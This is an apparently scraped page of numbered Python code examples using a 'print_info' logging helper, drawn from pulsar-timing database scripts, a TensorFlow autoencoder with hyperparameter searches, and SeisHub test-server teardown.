  scale_factor = (max - min) / ds_gap
  ds = np.asarray(ds) * scale_factor
  shift_factor = min - np.min(ds)
  ds += shift_factor
  return ds
Example #43
0
 def _compute(self):
     utils.print_info("Creating profile plot for %s" % self.fn, 3)
     params = utils.prep_file(self.fn)
     handle, tmpfn = tempfile.mkstemp(suffix=".png")
     os.close(handle)
     cmd = ["psrplot", "-p", "flux", "-j", "TDFp", "-c", \
             "above:c=%s" % os.path.split(self.fn)[-1], \
             "-D", "%s/PNG" % tmpfn, self.fn]
     utils.execute(cmd)
     tmpdir = os.path.split(tmpfn)[0]
     pngfn = os.path.join(tmpdir, self.fn+".flux.png")
     shutil.move(tmpfn, pngfn) 
     return pngfn
Example #44
0
def visualize_from_checkpoint(checkpoint, epoch=None):
  assert os.path.exists(checkpoint)
  FLAGS.load_from_checkpoint = checkpoint
  file_filter = r'.*\d+\.txt$' if epoch is None else r'.*e\|%d.*' % epoch
  latest_file = ut.get_latest_file(folder=checkpoint, filter=file_filter)
  print(latest_file)
  ut.print_info('Encoding file: %s' % latest_file.split('/')[-1])
  data = np.loadtxt(latest_file)
  fig = plt.figure()
  fig.set_size_inches(fig.get_size_inches()[0] * 2, fig.get_size_inches()[1] * 2)
  entity = EncodingVisualizer(fig, data)
  # fig.tight_layout()
  plt.show()
Example #45
0
  def _build_encoder(self):
    """Construct encoder network: placeholders, operations, optimizer"""
    self._input = tf.placeholder(tf.float32, self._batch_shape, name='input')

    self._encode = (pt.wrap(self._input)
                    .flatten())

    for i in range(self.layer_narrow + 1):
      size, desc = self.layers[i], 'enc_hidden_%d' % i
      self._encode = self._encode.fully_connected(size, name=desc)
      if i == self.layer_narrow-1 or i == self.layer_narrow-2:
        ut.print_info('Dropout. layer:%d, layer_size:%d, DO_value:%f' % (i, self.layers[i], 1.0-FLAGS.dropout))
        self._encode = self._encode.dropout(1.0-FLAGS.dropout)
def stop_seishub_server(proc):
    """
    Terminates the passed process object.
    """
    proc.terminate()
    proc.kill()
    proc.wait()

    # Wait for a short time and then just kill it. Quite brute force, but the
    # only reliable way I could find.
    time.sleep(0.2)
    os.system('pkill -f "python -m seishub.core.daemon"')

    print_info("SeisHub Server terminated.")
Example #47
0
def main(args):
    matches = find_overlaps(args.rawfile)
    utils.print_info("Number of overlapping files in DB: %d" % \
                        len(matches), 1)
    lines = ["Overlapping files:"]
    if matches:
        for match in matches:
            fn = os.path.join(match['filepath'], match['filename'])
            lines.append("    %s" % fn)
    else:
        lines.append("    None")    
    msg = "\n".join(lines)
    utils.print_info(msg, 2)
    sys.exit(len(matches))
Example #48
0
def main(args):
    if args.timfile_id is None:
        raise errors.BadInputError("A timfile_id must be provided!")

    # Connect to the database
    db = database.Database()
    db.connect()

    try:
        utils.print_info("Timfile ID to set as master: %d" % args.timfile_id, 1)
        if not args.dry_run:
            set_as_master_timfile(args.timfile_id, db)
    finally:
        # Close DB connection
        db.close()
Example #49
0
  def fetch_datasets(self, activation_func_bounds):
    original_data, filters = inp.get_images(FLAGS.input_path)
    assert len(filters) == len(original_data)
    original_data, filters = self.bloody_hack_filterbatches(original_data, filters)
    ut.print_info('shapes. data, filters: %s' % str((original_data.shape, filters.shape)))

    original_data = inp.rescale_ds(original_data, activation_func_bounds.min, activation_func_bounds.max)
    self._image_shape = inp.get_image_shape(FLAGS.input_path)

    if DEV:
      original_data = original_data[:300]

    self.epoch_size = math.ceil(len(original_data) / FLAGS.batch_size)
    self.test_size = math.ceil(len(original_data) / FLAGS.batch_size)
    return original_data, filters
Example #50
0
def manual_pca(data):
  """remove meaningless dimensions"""
  std = data[0:300].std(axis=0)

  order = np.argsort(std)[::-1]
  # order = np.arange(0, data.shape[1]).astype(np.int32)
  std = std[order]
  # filter components by STD but take at least 3

  meaningless = [order[i] for i, x in enumerate(std) if x <= STD_THRESHOLD]
  if any(meaningless) and data.shape[1] > 3:
    ut.print_info('meaningless dimensions on visualization: %s' % str(meaningless))

  order = [order[i] for i, x in enumerate(std) if x > STD_THRESHOLD or i < 3]
  order.sort()
  return data[:, order]
def cleanup():
    """
    Simply removes the temporarily created SeisHub instance.
    """
    print_info("Cleaning up...")

    # Try deleting it for some seconds...
    t = time.time()
    while (time.time() - t) < 10.0:
        time.sleep(0.1)
        try:
            if os.path.exists(TEST_DIRECTORY):
                shutil.rmtree(TEST_DIRECTORY)
            return
        except:
            pass
    print_error("Cleanup failed.")
Example #52
0
def main():
    # Connect to the database
    db = database.Database()
    db.connect()

    try:
        if args.parfile is not None:
            # parfile filename provided. Get parfile_id
            parfile_id = utils.get_parfile_id(args.parfile, db)
        else:
            parfile_id = args.parfile_id
        utils.print_info("Parfile ID to set as master: %d" % parfile_id, 1)
        if not args.dry_run:
            utils.set_as_master_parfile(parfile_id, db)
    finally:
        # Close DB connection
        db.close()
Example #53
0
 def _compute(self):
     utils.print_info("Creating freq vs. phase plot for %s" % self.fn, 3)
     params = utils.prep_file(self.fn)
     if not (params['nchan'] > 1):
         raise errors.DiagnosticNotApplicable("Archive (%s) only has " \
                     "a single channel. Freq vs. phase diagnostic " \
                     "doesn't apply to this data file." % self.fn)
 
     handle, tmpfn = tempfile.mkstemp(suffix=".png")
     os.close(handle)
     cmd = ["psrplot", "-p", "freq", "-j", "DTp", "-c", \
             "above:c=%s" % os.path.split(self.fn)[-1], \
             "-D", "%s/PNG" % tmpfn, "%s" % self.fn]
     utils.execute(cmd)
     tmpdir = os.path.split(tmpfn)[0]
     pngfn = os.path.join(tmpdir, self.fn+".freq.png")
     shutil.move(tmpfn, pngfn) 
     return pngfn
Example #54
0
def main(args):
    # Connect to the database
    db = database.Database()
    db.connect()

    try:
        if args.template is not None:
            utils.print_info("Getting template ID for %s using filename and md5" % args.template, 1)
            # template filename provided. Get template_id
            template_id = utils.get_template_id(args.template, db)
        else:
            template_id = args.template_id
        utils.print_info("Template ID to set as master: %d" % template_id, 1)
        if not args.dry_run:
            utils.set_as_master_template(template_id, db)
    finally:
        # Close DB connection
        db.close()
Example #55
0
  def train(self, epochs_to_train=5):
    meta = self.get_meta()
    ut.print_time('train started: \n%s' % ut.to_file_name(meta))
    # return meta, np.random.randn(epochs_to_train)
    ut.configure_folders(FLAGS, meta)

    self._dataset, self._filters = self.fetch_datasets(self._activation)
    self.build_model()
    self._register_training_start()

    with tf.Session() as sess:
      sess.run(tf.initialize_all_variables())
      self._saver = tf.train.Saver()

      if FLAGS.load_state and os.path.exists(self.get_checkpoint_path()):
        self._saver.restore(sess, self.get_checkpoint_path())
        ut.print_info('Restored requested. Previous epoch: %d' % self.get_past_epochs(), color=31)

      # MAIN LOOP
      for current_epoch in xrange(epochs_to_train):

        feed, permutation = self._get_epoch_dataset()
        for _, batch in enumerate(feed):
          filter = batch[1][0]
          assert batch[1][0,0] == batch[1][-1,0]
          encoding, = sess.run([self._encode], feed_dict={self._input: batch[0]})   # 1.1 encode forward
          clamped_enc, vae_grad = _clamp(encoding, filter)                          # 1.2 # clamp

          sess.run(self._assign_clamped, feed_dict={self._clamped:clamped_enc})
          reconstruction, loss, clamped_gradient, _ = sess.run(          # 2.1 decode forward+backward
            [self._decode, self._decoder_loss, self._clamped_grad, self._train_decoder],
            feed_dict={self._clamped: clamped_enc, self._reconstruction: batch[0]})

          declamped_grad = _declamp_grad(vae_grad, clamped_gradient, filter) # 2.2 prepare gradient
          _, step = sess.run(                                            # 3.0 encode backward path
            [self._train_encoder, self._step],
            feed_dict={self._input: batch[0], self._encoding: encoding-declamped_grad})          # Profit

          self._register_batch(batch, encoding, reconstruction, loss)
        self._register_epoch(current_epoch, epochs_to_train, permutation, sess)
      self._writer = tf.train.SummaryWriter(FLAGS.logdir, sess.graph)
      meta = self._register_training()
    return meta, self._stats['epoch_accuracy']
Example #56
0
def print_data(data, fig, subplot, is_3d=True):
  colors = np.arange(0, 180)
  colors = np.concatenate((colors, colors[::-1]))
  colors = vi.duplicate_array(colors, total_length=len(data))

  if is_3d:
    subplot = fig.add_subplot(subplot, projection='3d')
    subplot.set_title('All data')
    subplot.scatter(data[:, 0], data[:, 1], data[:, 2], c=colors, cmap=plt.cm.Spectral, picker=5)
  else:
    subsample = data[0:360] if len(data) < 2000 else data[0:720]
    subsample = np.concatenate((subsample, subsample))[0:len(subsample)+1]
    ut.print_info('subsample shape %s' % str(subsample.shape))
    subsample_colors = colors[0:len(subsample)]
    subplot = fig.add_subplot(subplot)
    subplot.set_title('First 360 elem')
    subplot.plot(subsample[:, 0], subsample[:, 1], picker=0)
    subplot.plot(subsample[0, 0], subsample[0, 1], picker=0)
    subplot.scatter(subsample[:, 0], subsample[:, 1], s=50, c=subsample_colors,
                    cmap=plt.cm.Spectral, picker=5)
  return subplot
Example #57
0
def search_learning_rate(lrs=[0.001, 0.0004, 0.0001, 0.00003,],
                         epochs=500):
  FLAGS.suffix = 'grid_lr'
  ut.print_info('START: search_learning_rate', color=31)

  best_result, best_args = None, None
  result_summary, result_list = [], []

  for lr in lrs:
    ut.print_info('STEP: search_learning_rate', color=31)
    FLAGS.learning_rate = lr
    model = model_class()
    meta, accuracy_by_epoch = model.train(epochs)
    result_list.append((ut.to_file_name(meta), accuracy_by_epoch))
    best_accuracy = np.min(accuracy_by_epoch)
    result_summary.append('\n\r lr:%2.5f \tq:%.2f' % (lr, best_accuracy))
    if best_result is None or best_result > best_accuracy:
      best_result = best_accuracy
      best_args = lr

  meta = {'suf': 'grid_lr_bs', 'e': epochs, 'lrs': lrs, 'acu': best_result,
          'bs': FLAGS.batch_size, 'h': model.get_layer_info()}
  pickle.dump(result_list, open('search_learning_rate%d.txt' % epochs, "wb"))
  ut.plot_epoch_progress(meta, result_list)
  print(''.join(result_summary))
  ut.print_info('BEST Q: %d IS ACHIEVED FOR LR: %f' % (best_result, best_args), 36)
Example #58
0
def search_batch_size(bss=[50], strides=[1, 2, 5, 20], epochs=500):
  FLAGS.suffix = 'grid_bs'
  ut.print_info('START: search_batch_size', color=31)
  best_result, best_args = None, None
  result_summary, result_list = [], []

  print(bss)
  for bs in bss:
    for stride in strides:
      ut.print_info('STEP: search_batch_size %d %d' % (bs, stride), color=31)
      FLAGS.batch_size = bs
      FLAGS.stride = stride
      model = model_class()
      start = dt.now()
      # meta, accuracy_by_epoch = model.train(epochs * int(bs / bss[0]))
      meta, accuracy_by_epoch = model.train(epochs)
      meta['str'] = stride
      meta['t'] = int((dt.now() - start).seconds)
      result_list.append((ut.to_file_name(meta)[22:], accuracy_by_epoch))
      best_accuracy = np.min(accuracy_by_epoch)
      result_summary.append('\n\r bs:%d \tst:%d \tq:%.2f' % (bs, stride, best_accuracy))
      if best_result is None or best_result > best_accuracy:
        best_result = best_accuracy
        best_args = (bs, stride)

  meta = {'suf': 'grid_batch_bs', 'e': epochs, 'acu': best_result,
          'h': model.get_layer_info()}
  pickle.dump(result_list, open('search_batch_size%d.txt' % epochs, "wb"))
  ut.plot_epoch_progress(meta, result_list)
  print(''.join(result_summary))

  ut.print_info('BEST Q: %d IS ACHIEVED FOR bs, st: %d %d' % (best_result, best_args[0], best_args[1]), 36)
Example #59
0
def search_layer_sizes(epochs=500):
  FLAGS.suffix = 'grid_h'
  ut.print_info('START: search_layer_sizes', color=31)
  best_result, best_args = None, None
  result_summary, result_list = [], []

  for _, h_encoder in enumerate([300, 700, 2500]):
    for _, h_decoder in enumerate([300, 700, 2500]):
      for _, h_narrow in enumerate([3]):
        model = model_class()
        model.layer_encoder = h_encoder
        model.layer_narrow = h_narrow
        model.layer_decoder = h_decoder
        layer_info = str(model.get_layer_info())
        ut.print_info('STEP: search_layer_sizes: ' + str(layer_info), color=31)

        meta, accuracy_by_epoch = model.train(epochs)
        result_list.append((layer_info, accuracy_by_epoch))
        best_accuracy = np.min(accuracy_by_epoch)
        result_summary.append('\n\r h:%s \tq:%.2f' % (layer_info, best_accuracy))
        if best_result is None or best_result > best_accuracy:
          best_result = best_accuracy
          best_args = layer_info

  meta = {'suf': 'grid_H_bs', 'e': epochs, 'acu': best_result,
          'bs': FLAGS.batch_size, 'h': model.get_layer_info()}
  print(''.join(result_summary))
  pickle.dump(result_list, open('search_layer_sizes%d.txt' % epochs, "wb"))
  ut.print_info('BEST Q: %d IS ACHIEVED FOR H: %s' % (best_result, best_args), 36)
  ut.plot_epoch_progress(meta, result_list)